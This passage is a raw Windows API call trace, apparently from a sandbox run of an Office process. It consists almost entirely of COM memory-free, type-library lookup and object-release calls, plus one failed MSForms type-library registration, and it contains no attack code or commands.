IMalloc:Free (This=0x7fefe015380, pv=0xb491970) [0031.415] IMalloc:Free (This=0x7fefe015380, pv=0xb491950) [0031.415] IMalloc:Free (This=0x7fefe015380, pv=0xb4916f0) [0031.415] IMalloc:Free (This=0x7fefe015380, pv=0xb491870) [0031.415] IMalloc:Free (This=0x7fefe015380, pv=0xb491830) [0031.415] IMalloc:Free (This=0x7fefe015380, pv=0xb491670) [0031.415] IMalloc:Free (This=0x7fefe015380, pv=0xb4915b0) [0031.415] IMalloc:Free (This=0x7fefe015380, pv=0xb4914d0) [0031.415] IMalloc:Free (This=0x7fefe015380, pv=0xb4914f0) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0xb491a90) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0xb491710) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0xb491390) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0xb491470) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0xb4918f0) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0xb491ab0) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0xb491450) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0xb4918b0) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0xb491790) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0xb4919b0) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0xb491610) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0xb4916d0) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0xb491070) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0xb4916b0) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0xb491570) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0xb491a10) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0xb490fb0) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0xb491910) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0xb4917f0) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0xb490f30) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0xb491010) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0xb491990) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0xb491690) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0xb491050) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0xb491890) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0xb490e30) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0xb490d90) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0xb4913f0) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0xb491650) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0xb491290) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0xb490ff0) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0xb491590) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0xb515760) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0x76dc400) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0x7667050) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0x76660c0) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0x76dc440) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0x7666ff0) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0x76dc480) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0x7666000) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0x7665fd0) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0x7665fa0) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0x7665f70) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0x7665f40) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0x7665f10) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0x7666ea0) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0x76dc3c0) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0x76dc380) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0x7666f90) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0x76663c0) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0x7666390) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0x7666360) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0x7666300) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0x76662d0) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0x76dc340) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0x76dc280) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0x76662a0) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0x7666270) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0x76dc2c0) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0x7666210) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0x76661e0) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0x76661b0) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0x7666180) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0x7666150) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0x76660f0) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0x766d2c0) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0x7666480) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0x7666450) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0x7666c60) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0x76dc300) [0031.416] IMalloc:Free (This=0x7fefe015380, pv=0x76dc240) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x76dc200) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x76dc1c0) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x7666060) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x7666cf0) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x7666090) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x76665d0) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x76dc180) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x76dc140) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x76665a0) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x7666570) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x7666540) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x76664e0) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x76664b0) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x7666630) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x7666660) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x7666690) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x76666c0) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x76666f0) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x7666750) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x7666780) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x76667b0) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x76667e0) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x7666810) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x7666840) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x76dc100) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x76dc0c0) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x76668a0) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x76668d0) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x76dc080) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x76dc040) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x7666900) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x7666930) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x7666960) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x7666990) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x76669f0) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x7666a50) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x7666a80) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x7666ab0) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x7666ae0) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x7666b10) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x7666b70) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x7666ba0) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x7666bd0) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x7666c00) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x7666d20) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x7666d50) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x7666db0) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x7666de0) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x7666e70) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x7667110) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x76dc000) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x7667020) [0031.417] IMalloc:Free (This=0x7fefe015380, pv=0x7666f60) [0031.417] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76dc000 [0031.419] IMalloc:Free (This=0x7fefe015380, pv=0xb491290) [0031.419] IMalloc:Free (This=0x7fefe015380, pv=0xb491590) [0031.419] IMalloc:Free (This=0x7fefe015380, pv=0xb490ff0) [0031.419] IMalloc:Free (This=0x7fefe015380, pv=0xb491650) [0031.419] IMalloc:Free (This=0x7fefe015380, pv=0xb490d90) [0031.419] IMalloc:Free (This=0x7fefe015380, pv=0xb491010) [0031.419] IMalloc:Free (This=0x7fefe015380, pv=0xb491990) [0031.419] IMalloc:Free (This=0x7fefe015380, pv=0xb491690) [0031.419] IMalloc:Free (This=0x7fefe015380, pv=0xb491050) [0031.419] IMalloc:Free (This=0x7fefe015380, pv=0xb491890) [0031.419] IMalloc:Free (This=0x7fefe015380, pv=0xb490e30) [0031.419] IMalloc:Free (This=0x7fefe015380, pv=0xb4913f0) [0031.419] IMalloc:Free (This=0x7fefe015380, pv=0xb515760) [0031.419] IMalloc:Free (This=0x7fefe015380, pv=0x76dc000) [0031.419] IMalloc:Free (This=0x7fefe015380, pv=0x76dc040) [0031.419] IMalloc:Free (This=0x7fefe015380, pv=0x7666f60) [0031.419] IMalloc:Free (This=0x7fefe015380, pv=0x7667020) [0031.419] IMalloc:Free (This=0x7fefe015380, pv=0x7667110) [0031.419] IMalloc:Free (This=0x7fefe015380, pv=0x7666e70) [0031.419] IMalloc:Free (This=0x7fefe015380, pv=0x7666de0) [0031.419] IMalloc:Free (This=0x7fefe015380, pv=0x7666db0) [0031.419] IMalloc:Free (This=0x7fefe015380, pv=0x7666d50) [0031.420] IMalloc:Free (This=0x7fefe015380, pv=0x7666d20) [0031.420] IMalloc:Free (This=0x7fefe015380, pv=0x7666c00) [0031.420] IMalloc:Free (This=0x7fefe015380, pv=0x7666bd0) [0031.420] ITypeInfo:GetImplTypeFlags (in: This=0xb4ceb90, index=0x0, pImplTypeFlags=0x2e6948 | out: pImplTypeFlags=0x2e6948*=1) returned 0x0 [0031.420] IUnknown:Release (This=0x780bd68) returned 0x2 [0031.420] ITypeInfo:GetImplTypeFlags (in: This=0xb4ceb90, index=0x1, pImplTypeFlags=0x2e694c | out: pImplTypeFlags=0x2e694c*=3) returned 0x0 [0031.420] IUnknown:Release (This=0x780c788) returned 0x2 [0031.420] IUnknown:Release (This=0xb4cdab8) returned 0x1 [0031.420] IUnknown:Release (This=0xb4ceb38) returned 0x1 [0031.420] IUnknown:Release (This=0xb4ceb90) returned 0x1 [0031.420] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x63, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cec40) returned 0x0 [0031.420] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76dc040 [0031.434] IMalloc:Free (This=0x7fefe015380, pv=0xb4918f0) [0031.434] IMalloc:Free (This=0x7fefe015380, pv=0xb491530) [0031.434] IMalloc:Free (This=0x7fefe015380, pv=0xb490e30) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491690) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491710) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491890) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491990) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491a90) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491050) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491010) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491470) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb490d90) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491390) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb4914d0) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb4914f0) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb4915b0) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491910) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb4917f0) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb490f30) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb490fd0) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491290) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491650) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491770) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491830) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491790) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491610) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491950) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb490fb0) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491810) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491af0) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491b30) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb4914b0) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491b10) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491870) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491a70) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491b50) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491430) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491570) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb490ff0) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb4916b0) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491590) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491070) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb4916d0) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb4915d0) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb4919d0) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491550) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb4919b0) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491410) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb4918d0) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491490) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491b90) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491bb0) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491b70) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb4919f0) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491bd0) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491ad0) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491a30) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb4916f0) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb4917b0) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491630) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491930) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb4918b0) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491970) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491850) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb4915f0) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491a50) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491a10) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491510) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb4917d0) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491750) [0031.435] IMalloc:Free (This=0x7fefe015380, pv=0xb491730) [0031.436] IMalloc:Free (This=0x7fefe015380, pv=0xb4913b0) [0031.436] IMalloc:Free (This=0x7fefe015380, pv=0xb4913d0) [0031.436] IMalloc:Free (This=0x7fefe015380, pv=0xb491370) [0031.436] IMalloc:Free (This=0x7fefe015380, pv=0xb491450) [0031.436] IMalloc:Free (This=0x7fefe015380, pv=0xb491670) [0031.436] IMalloc:Free (This=0x7fefe015380, pv=0xb491ab0) [0031.436] IMalloc:Free (This=0x7fefe015380, pv=0xb515760) [0031.436] IMalloc:Free (This=0x7fefe015380, pv=0x76dc040) [0031.436] IMalloc:Free (This=0x7fefe015380, pv=0x7666bd0) [0031.438] IUnknown:Release (This=0x780bdc8) returned 0x2 [0031.438] ITypeInfo:GetImplTypeFlags (in: This=0xb4cec40, index=0x1, pImplTypeFlags=0x2e694c | out: pImplTypeFlags=0x2e694c*=3) returned 0x0 [0031.438] IUnknown:Release (This=0x780c848) returned 0x2 [0031.438] IUnknown:Release (This=0xb4cdb68) returned 0x1 [0031.438] IUnknown:Release (This=0xb4cebe8) returned 0x1 [0031.438] IUnknown:Release (This=0xb4cec40) returned 0x1 [0031.438] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x67, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ceda0) returned 0x0 [0031.438] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76dbbc0 [0031.442] IUnknown:Release (This=0x780be28) returned 0x2 [0031.442] ITypeInfo:GetImplTypeFlags (in: This=0xb4ceda0, index=0x1, pImplTypeFlags=0x2e694c | out: pImplTypeFlags=0x2e694c*=3) returned 0x0 [0031.442] IUnknown:Release (This=0x780c908) returned 0x2 [0031.442] IUnknown:Release (This=0xb4cdc18) returned 0x1 [0031.442] IUnknown:Release (This=0xb4cec98) returned 0x1 [0031.442] IUnknown:Release (This=0xb4ceda0) returned 0x1 [0031.442] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x68, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cedf8) returned 0x0 [0031.442] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76dc440 [0031.445] IUnknown:Release (This=0x780be88) returned 0x2 [0031.445] ITypeInfo:GetImplTypeFlags (in: This=0xb4cedf8, index=0x1, pImplTypeFlags=0x2e694c | out: pImplTypeFlags=0x2e694c*=3) returned 0x0 [0031.445] IUnknown:Release (This=0x780c968) returned 0x2 [0031.445] IUnknown:Release (This=0xb4cdcc8) returned 0x1 [0031.445] IUnknown:Release (This=0xb4cecf0) returned 0x1 [0031.445] IUnknown:Release (This=0xb4cedf8) returned 0x1 [0031.445] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x69, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cee50) returned 0x0 [0031.445] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76dbc00 [0031.448] IUnknown:Release (This=0x780bee8) returned 0x2 [0031.448] ITypeInfo:GetImplTypeFlags (in: This=0xb4cee50, index=0x1, pImplTypeFlags=0x2e694c | out: pImplTypeFlags=0x2e694c*=3) returned 0x0 [0031.448] IUnknown:Release (This=0x780c9c8) returned 0x2 [0031.448] IUnknown:Release (This=0xb4cdd78) returned 0x1 [0031.448] IUnknown:Release (This=0xb4ced48) returned 0x1 [0031.448] IUnknown:Release (This=0xb4cee50) returned 0x1 [0031.448] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x6a, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ceea8) returned 0x0 [0031.449] IUnknown:Release (This=0xb4ceea8) returned 0x1 [0031.449] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x6c, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cef58) returned 0x0 [0031.449] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76dc480 [0031.450] IUnknown:Release (This=0x780bf48) returned 0x2 [0031.450] ITypeInfo:GetImplTypeFlags (in: This=0xb4cef58, index=0x1, pImplTypeFlags=0x2e694c | out: pImplTypeFlags=0x2e694c*=3) returned 0x0 [0031.450] IUnknown:Release (This=0x780cba8) returned 0x2 [0031.450] IUnknown:Release (This=0xb4cde28) returned 0x1 [0031.450] IUnknown:Release (This=0xb4cef00) returned 0x1 [0031.450] IUnknown:Release (This=0xb4cef58) returned 0x1 [0031.450] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x6e, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cf008) returned 0x0 [0031.450] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76dbf40 [0031.480] RegisterTypeLib (ptlib=0x782b8a0, szFullPath="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE\\MSForms.exd", szHelpDir=0x0) returned 0x8002801c [0031.535] IUnknown:Release (This=0x782b8a0) returned 0xac [0031.535] IUnknown:Release (This=0xb4cbe88) returned 0x0 [0031.535] IUnknown:Release (This=0x7809ba8) returned 0x0 [0031.535] IUnknown:Release (This=0xb4cbee0) returned 0x0 [0031.535] IUnknown:Release (This=0x7809cc8) returned 0x0 [0031.535] IUnknown:Release (This=0xb4cbf38) returned 0x0 [0031.535] IUnknown:Release (This=0x7809d28) returned 0x0 [0031.535] IUnknown:Release (This=0xb4cbf90) returned 0x0 [0031.535] IUnknown:Release (This=0x7809d88) returned 0x0 [0031.535] IUnknown:Release (This=0xb4cbfe8) returned 0x0 [0031.535] IUnknown:Release (This=0x7809de8) returned 0x0 [0031.535] IUnknown:Release (This=0xb4cc040) returned 0x0 [0031.535] IUnknown:Release (This=0x7809e48) returned 0x0 [0031.535] IUnknown:Release (This=0xb4cc098) returned 0x0 [0031.535] IUnknown:Release (This=0x7809ea8) returned 0x0 [0031.535] IUnknown:Release (This=0xb4cc0f0) returned 0x0 [0031.535] IUnknown:Release (This=0x7809f08) returned 0x0 [0031.535] IUnknown:Release (This=0xb4cc1a0) returned 0x0 [0031.535] IUnknown:Release (This=0x7809f68) returned 0x0 [0031.535] IUnknown:Release (This=0xb4cc250) returned 0x0 [0031.535] IUnknown:Release (This=0x7809fc8) returned 0x0 [0031.535] IUnknown:Release (This=0xb4cc300) returned 0x0 [0031.535] IUnknown:Release (This=0x780a028) returned 0x0 [0031.535] IUnknown:Release (This=0xb4cc3b0) returned 0x0 [0031.535] IUnknown:Release (This=0x7809c68) returned 0x0 [0031.535] IUnknown:Release (This=0xb4cc460) returned 0x0 [0031.535] IUnknown:Release (This=0x7809c08) returned 0x0 [0031.535] IUnknown:Release (This=0xb4cc510) returned 0x0 [0031.535] IUnknown:Release (This=0x780a088) returned 0x0 [0031.535] IUnknown:Release (This=0xb4cc568) returned 0x0 [0031.535] IUnknown:Release (This=0x780a0e8) returned 0x0 [0031.535] IUnknown:Release (This=0xb4cc5c0) returned 0x0 [0031.535] IUnknown:Release (This=0x780a268) returned 0x0 [0031.535] IUnknown:Release (This=0xb4cc618) returned 0x0 [0031.535] IUnknown:Release (This=0x780a3e8) returned 0x0 [0031.535] IUnknown:Release (This=0xb4cc670) returned 0x0 [0031.535] IUnknown:Release (This=0x780a568) returned 0x0 [0031.535] IUnknown:Release (This=0xb4cc6c8) returned 0x0 [0031.535] IUnknown:Release (This=0x780a6e8) returned 0x0 [0031.535] IUnknown:Release (This=0xb4cc720) returned 0x0 [0031.535] IUnknown:Release (This=0x780a868) returned 0x0 [0031.535] IUnknown:Release (This=0xb4cc778) returned 0x0 [0031.535] IUnknown:Release (This=0x780a9e8) returned 0x0 [0031.535] IUnknown:Release (This=0xb4cc7d0) returned 0x0 [0031.535] IUnknown:Release (This=0x780aa48) returned 0x0 [0031.535] IUnknown:Release (This=0xb4cc828) returned 0x0 [0031.535] IUnknown:Release (This=0x780aaa8) returned 0x0 [0031.535] IUnknown:Release (This=0xb4cc880) returned 0x0 [0031.535] IUnknown:Release (This=0x780ab08) returned 0x0 [0031.535] IUnknown:Release (This=0xb4cc8d8) returned 0x0 [0031.535] IUnknown:Release (This=0x780ab68) returned 0x0 [0031.535] IUnknown:Release (This=0xb4cc930) returned 0x0 [0031.535] IUnknown:Release (This=0x780abc8) returned 0x0 [0031.535] IUnknown:Release (This=0xb4cc988) returned 0x0 [0031.535] IUnknown:Release (This=0x780ac28) returned 0x0 [0031.535] IUnknown:Release (This=0xb4cc9e0) returned 0x0 [0031.535] IUnknown:Release (This=0x780ac88) returned 0x0 [0031.535] IUnknown:Release (This=0xb4cca38) returned 0x0 [0031.535] IUnknown:Release (This=0x780ace8) returned 0x0 [0031.535] IUnknown:Release (This=0xb4cca90) returned 0x0 [0031.535] IUnknown:Release (This=0x780ad48) returned 0x0 [0031.535] IUnknown:Release (This=0xb4ccae8) returned 0x0 [0031.535] IUnknown:Release (This=0x780ada8) returned 0x0 [0031.535] IUnknown:Release (This=0xb4ccb40) returned 0x0 [0031.536] IUnknown:Release (This=0x780ae08) returned 0x0 [0031.536] IUnknown:Release (This=0xb4ccb98) returned 0x0 [0031.536] IUnknown:Release (This=0x780ae68) returned 0x0 [0031.536] IUnknown:Release (This=0xb4ccbf0) returned 0x0 [0031.536] IUnknown:Release (This=0x780aec8) returned 0x0 [0031.536] IUnknown:Release (This=0xb4ccc48) returned 0x0 [0031.536] IUnknown:Release (This=0x780af28) returned 0x0 [0031.536] IUnknown:Release (This=0xb4ccca0) returned 0x0 [0031.536] IUnknown:Release (This=0x780af88) returned 0x0 [0031.536] IUnknown:Release (This=0xb4cccf8) returned 0x0 [0031.536] IUnknown:Release (This=0x780afe8) returned 0x0 [0031.536] IUnknown:Release (This=0xb4ccd50) returned 0x0 [0031.536] IUnknown:Release (This=0x780b048) returned 0x0 [0031.536] IUnknown:Release (This=0xb4ccda8) returned 0x0 [0031.536] IUnknown:Release (This=0x780b0a8) returned 0x0 [0031.536] IUnknown:Release (This=0xb4cce58) returned 0x0 [0031.536] IUnknown:Release (This=0x780b108) returned 0x0 [0031.536] IUnknown:Release (This=0xb4ccf08) returned 0x0 [0031.536] IUnknown:Release (This=0x780b168) returned 0x0 [0031.536] IUnknown:Release (This=0xb4ccfb8) returned 0x0 [0031.536] IUnknown:Release (This=0x780b1c8) returned 0x0 [0031.536] IUnknown:Release (This=0xb4cd068) returned 0x0 [0031.536] IUnknown:Release (This=0x780b228) returned 0x0 [0031.536] IUnknown:Release (This=0xb4cd0c0) returned 0x0 [0031.536] IUnknown:Release (This=0x780b288) returned 0x0 [0031.536] IUnknown:Release (This=0xb4cd118) returned 0x0 [0031.536] IUnknown:Release (This=0x780b2e8) returned 0x0 [0031.536] IUnknown:Release (This=0xb4cd170) returned 0x0 [0031.536] IUnknown:Release (This=0x780b468) returned 0x0 [0031.536] IUnknown:Release (This=0xb4cd1c8) returned 0x0 [0031.536] IUnknown:Release (This=0x780b4c8) returned 0x0 [0031.536] IUnknown:Release (This=0xb4cd220) returned 0x0 [0031.536] IUnknown:Release (This=0x780b528) returned 0x0 [0031.536] IUnknown:Release (This=0xb4cd278) returned 0x0 [0031.536] IUnknown:Release (This=0x780b588) returned 0x0 [0031.536] IUnknown:Release (This=0xb4cd2d0) returned 0x0 [0031.536] IUnknown:Release (This=0x780b5e8) returned 0x0 [0031.536] IUnknown:Release (This=0xb4cd328) returned 0x0 [0031.536] IUnknown:Release (This=0x780b648) returned 0x0 [0031.536] IUnknown:Release (This=0xb4cd380) returned 0x0 [0031.536] IUnknown:Release (This=0x780b6a8) returned 0x0 [0031.536] IUnknown:Release (This=0xb4cd3d8) returned 0x0 [0031.536] IUnknown:Release (This=0x780b708) returned 0x0 [0031.536] IUnknown:Release (This=0xb4cd430) returned 0x0 [0031.536] IUnknown:Release (This=0x780b768) returned 0x0 [0031.536] IUnknown:Release (This=0xb4cd488) returned 0x0 [0031.536] IUnknown:Release (This=0x780b7c8) returned 0x0 [0031.536] IUnknown:Release (This=0xb4cd4e0) returned 0x0 [0031.536] IUnknown:Release (This=0x780b828) returned 0x0 [0031.536] IUnknown:Release (This=0xb4cd538) returned 0x0 [0031.536] IUnknown:Release (This=0x780b888) returned 0x0 [0031.536] IUnknown:Release (This=0xb4cd590) returned 0x0 [0031.536] IUnknown:Release (This=0x780b8e8) returned 0x0 [0031.536] IUnknown:Release (This=0xb4cd5e8) returned 0x0 [0031.536] IUnknown:Release (This=0x780b948) returned 0x0 [0031.536] IUnknown:Release (This=0xb4cd640) 